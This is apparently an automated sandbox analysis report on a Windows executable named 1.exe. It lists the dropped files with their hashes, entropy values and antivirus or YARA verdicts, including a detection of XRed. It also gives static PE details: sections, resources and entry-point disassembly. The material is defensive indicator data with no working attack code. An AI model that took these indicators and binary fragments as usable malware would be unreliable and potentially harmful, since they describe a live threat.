                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="saCziqWFAkrqMYAFVbNj9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\fil3eRF.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263299926755047
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+01TbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                    MD5:B694F18937B923C719341DAC11244FA9
                                                                                                                    SHA1:9CB124ABD09C1E3BA403591B488EB83682A24083
                                                                                                                    SHA-256:C5C70B1C7FEC151B0D8A062A9AAB7578A246CD618933A3D3AE71B062FBEDDC39
                                                                                                                    SHA-512:119DA815E7EA2376215B9BC05323156ECE7E5A92C6BA568EDABF00A15D8F4DB82E2C6BC716FE0964CC8E6CB79AB8978CE550428C6AF0A028B25CC482F68CFF27
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kJ7wD94x3FBame4LCSsTZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\nBdDO4b.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.268602448567942
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0wuCbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                    MD5:1884CA0598AB0088FC091979E2E2E191
                                                                                                                    SHA1:17549906DE9EFFD54399AB61D78D948394B984D2
                                                                                                                    SHA-256:15505D6F32AAAF223287F86D60068DA77B0445E528AC7BC743662A8492638D3B
                                                                                                                    SHA-512:17BC5ACFF2EA2868BB73035F2048D4664A416D6145D521CCA0D9141F20570F1DE471A90DE6F813FABE932684A2DA087B930F2C9095BAD3A7E2F0318074C56966
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n9UqoUJyINaTFHjMYTiyRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\r4LgOhO.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.241269109409595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0eyRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                    MD5:A2478FF1AC238686FA25F571F8673F6C
                                                                                                                    SHA1:D9CB224262B8D57F822710C72FC26EBE5364DDBA
                                                                                                                    SHA-256:20A1CACC10C7C73512140DDC2CF5FD591BFD020385B1C4756AF23AA38B5D75E8
                                                                                                                    SHA-512:B471A7495551C0E83235A31C82BF69FE52C29C819572C5FB105645FA5FA96B0DBB986C9A1E87F6C3C4600CA26EA8834D11C45E50DB901FE49EB245F19B3C6634
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gcTGRowsu-vayc_cYM2gcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\svA3fW8.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.258415197370358
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                    MD5:4BFFF3D51B141C2E387AD88068BB69C3
                                                                                                                    SHA1:891FB77214FC1D6DE305098990ABC330C7B07ACB
                                                                                                                    SHA-256:9B44E533F921BF04C5F24E2A73046A521CED5F529F458579A34D80B446253580
                                                                                                                    SHA-512:E0062E4728DBFDC769A946139C529FD500FF3D45582EC204E9060EFF5666F79BAC247A11CA0FADB32C9CF51A584407E288E282169A1188E80DB67BA2B1BAD8A1
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ii3ipW0ZDNMR425ze015HA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\u6YNiq2.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.253327595725399
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BqdoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                    MD5:C93DEB775D5E6E0DCB3DA954E249DF3D
                                                                                                                    SHA1:6397A7DE487879FE738E6F5251C2DE846354B41D
                                                                                                                    SHA-256:2F75AFFD1F8364DB8C41BD0DF46BF460BD075E8055F9A3E2AE11DCBCE627F0AF
                                                                                                                    SHA-512:F03CECC94F9687371E8F531B0E47B69CE62888BF81B76F5A9E775608DEE4BB7448DDC0CB2E582FC7805FD0C853ED2A988DE2B4A5F33907DEFB71E9BB2F85A690
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0o3wa1GgXZ-ycUIFiIX5Tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\Desktop\._cache_1.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):329728
                                                                                                                    Entropy (8bit):6.754399552154763
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:aA6xKh6ckttv2vzCYaF82Dx6AU/AbMQTKhCVnXtn43J7:XkKh6c5bCYaF824EMQ+hCZXq
                                                                                                                    MD5:8F02CCF024090E3BD52574174749C778
                                                                                                                    SHA1:73CE3AFED686E7157CA919118B62F29F5A423196
                                                                                                                    SHA-256:F7E32CCE4D55BF0DC2F688466983F6F6AA69F1BDACAB7522297125AD04D9ECFC
                                                                                                                    SHA-512:97D68507DB1CACF116E19BAE4F01C99D9466AAF3A88F29AD52C4A9168E668AB8262F091ED4C0515D560774A013D53FFD8945CE5347198D6E65C4A7ACFC540E9C
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....vg.................H..........`.............@.......................................@..................................~...............................p...>..................................................8................................text..."F.......H.................. ..`.rdata...#...`...$...L..............@..@.data............X...p..............@....reloc...>...p...@..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\Documents\AFWAAFRXKO.xlsm

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                    C:\Users\user\Documents\~$AFWAAFRXKO.xlsx

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):165
                                                                                                                    Entropy (8bit):1.3801032810853697
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:UvNFiKVMNv:UvNsKVkv
                                                                                                                    MD5:9AA76EF018A0F672FA8DF9799D834C34
                                                                                                                    SHA1:75B4E1ADC263E4F966CAD3ECA3A2C84638CA525E
                                                                                                                    SHA-256:ED0F89EA4BAE07B1876B61240D06D56CDDB5CE83EF10E41F68142378CB750B77
                                                                                                                    SHA-512:6A8AF40C8225E60E652BCCB7D7E7FF03A8A014A7AC782D620AA6120B134213D4A4E279EF0005FCCBA513E85785E7CF6EA42422A6E936F4F690E47D0AAD11AA77
                                                                                                                    Malicious:false
                                                                                                                    Preview:.user ..t.o.t.t.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                    C:\Users\user\Documents\~$cache1

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):772096
                                                                                                                    Entropy (8bit):6.636956363807124
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9F6+:ansJ39LyjbJkQFMhmC+6GD9B
                                                                                                                    MD5:065BECDE24188ED65E53BECB09A5A039
                                                                                                                    SHA1:1B93E985BC3000BAC77112697F6702B2EB52CC37
                                                                                                                    SHA-256:641147AE6E518E7930EFE2A90B61DD0A22F23BBA6D77F7FAE48380A6F7842E6C
                                                                                                                    SHA-512:879D047CF07153B113D39A20BFDEC4B3429D5B431641D026AE38FBBD198C40BD28179CC03B9A208C3214B4E604E568E5813B20E720F150E9A06EE7C54D667A08
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................(....................@.......................... ...................@..............................B*......`....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...`........ ..................@..P....................................@..P........................................................................................................................................

                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.2988451233561795
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:LECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lfSD6VJSRhL:wCsL6seqD5SWSWVARh
                                                                                                                    MD5:8A8CB1BB8BB23FA49FA6C7240CA64FEC
                                                                                                                    SHA1:08EE29FF162066E444FA2279578302453671FCB7
                                                                                                                    SHA-256:017C495D36FD742C72E94C7BFB789B0EAE10B3329EFECF7090DAF8D04C60F46E
                                                                                                                    SHA-512:029A87BCBA78D4FBC7B3B792DDE63F4F192B970E1EB64D1E0D1CBA866F3A8F24C4342B3CCBFA79AEBB86029B37F504B7F91B7626CC3B72B507DAAEEC6ADFA3F6
                                                                                                                    Malicious:false
                                                                                                                    Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...H.`................................................................................................................................................................................................................................................................................................................................................|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):6.7652852257842975
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 93.58%
                                                                                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                                                    • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    File name:1.exe
                                                                                                                    File size:1'101'824 bytes
                                                                                                                    MD5:d0598443fa9984227105811e5d89b70f
                                                                                                                    SHA1:3932d4696f4130658fbf2a16e7f771fc756a63cc
                                                                                                                    SHA256:fc1595c71b570027b6712c70cafcc075686e14b5702a5a0910f642eb739ac01f
                                                                                                                    SHA512:142ebd6e1bf24d82533355e76bb9433deefdd4ee918ba04cc12419cc17cb564f86af386bf949617e386bffa1e0036ec5db912bc8b985a1de94330b3b14e3fd29
                                                                                                                    SSDEEP:24576:FnsJ39LyjbJkQFMhmC+6GD9nkKh5OYceEMQ+h0W:FnsHyjtk2MYC5GDT58M7hH
                                                                                                                    TLSH:2D359F22F3929077C5630A385CABA37958397F512F346D4B7BE4DE4C5E3A6C22835293
                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:1fc8cfce5e391d0d

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x49ab80
                                                                                                                    Entrypoint Section:CODE
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                    DLL Characteristics:
                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    add esp, FFFFFFF0h
                                                                                                                    mov eax, 0049A778h
                                                                                                                    call 00007F58DD073DBDh
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007F58DD0C7705h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, 0049ABE0h
                                                                                                                    call 00007F58DD0C7304h
                                                                                                                    mov ecx, dword ptr [0049DBDCh]
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, dword ptr [00496590h]
                                                                                                                    call 00007F58DD0C76F4h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007F58DD0C7768h
                                                                                                                    call 00007F58DD07189Bh
                                                                                                                    add byte ptr [eax], al

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x627a0.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0xb00000x627a00x628003f4bf534b7e82a87e254331294b5d609False0.546731242068528data6.6892158308280525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_CURSOR0xb0de00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                    RT_CURSOR0xb0f140x134data0.4642857142857143
                                                                                                                    RT_CURSOR0xb10480x134data0.4805194805194805
                                                                                                                    RT_CURSOR0xb117c0x134data0.38311688311688313
                                                                                                                    RT_CURSOR0xb12b00x134data0.36038961038961037
                                                                                                                    RT_CURSOR0xb13e40x134data0.4090909090909091
                                                                                                                    RT_CURSOR0xb15180x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                    RT_BITMAP0xb164c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                    RT_BITMAP0xb181c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                    RT_BITMAP0xb1a000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                    RT_BITMAP0xb1bd00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                    RT_BITMAP0xb1da00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                    RT_BITMAP0xb1f700x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                    RT_BITMAP0xb21400x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                    RT_BITMAP0xb23100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                    RT_BITMAP0xb24e00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                    RT_BITMAP0xb26b00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                    RT_BITMAP0xb28800xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                    RT_ICON0xb29680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.4589587242026266
                                                                                                                    RT_ICON0xb3a100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                    RT_DIALOG0xb4ab80x52data0.7682926829268293
                                                                                                                    RT_STRING0xb4b0c0x358data0.3796728971962617
                                                                                                                    RT_STRING0xb4e640x428data0.37406015037593987
                                                                                                                    RT_STRING0xb528c0x3a4data0.40879828326180256
                                                                                                                    RT_STRING0xb56300x3bcdata0.33472803347280333
                                                                                                                    RT_STRING0xb59ec0x2d4data0.4654696132596685
                                                                                                                    RT_STRING0xb5cc00x334data0.42804878048780487
                                                                                                                    RT_STRING0xb5ff40x42cdata0.42602996254681647
                                                                                                                    RT_STRING0xb64200x1f0data0.4213709677419355
                                                                                                                    RT_STRING0xb66100x1c0data0.44419642857142855
                                                                                                                    RT_STRING0xb67d00xdcdata0.6
                                                                                                                    RT_STRING0xb68ac0x320data0.45125
                                                                                                                    RT_STRING0xb6bcc0xd8data0.5879629629629629
                                                                                                                    RT_STRING0xb6ca40x118data0.5678571428571428
                                                                                                                    RT_STRING0xb6dbc0x268data0.4707792207792208
                                                                                                                    RT_STRING0xb70240x3f8data0.37598425196850394
                                                                                                                    RT_STRING0xb741c0x378data0.41103603603603606
                                                                                                                    RT_STRING0xb77940x380data0.35379464285714285
                                                                                                                    RT_STRING0xb7b140x374data0.4061085972850679
                                                                                                                    RT_STRING0xb7e880xe0data0.5535714285714286
                                                                                                                    RT_STRING0xb7f680xbcdata0.526595744680851
                                                                                                                    RT_STRING0xb80240x368data0.40940366972477066
                                                                                                                    RT_STRING0xb838c0x3fcdata0.34901960784313724
                                                                                                                    RT_STRING0xb87880x2fcdata0.36649214659685864
                                                                                                                    RT_STRING0xb8a840x354data0.31572769953051644
                                                                                                                    RT_RCDATA0xb8dd80x44data0.8676470588235294
                                                                                                                    RT_RCDATA0xb8e1c0x10data1.5
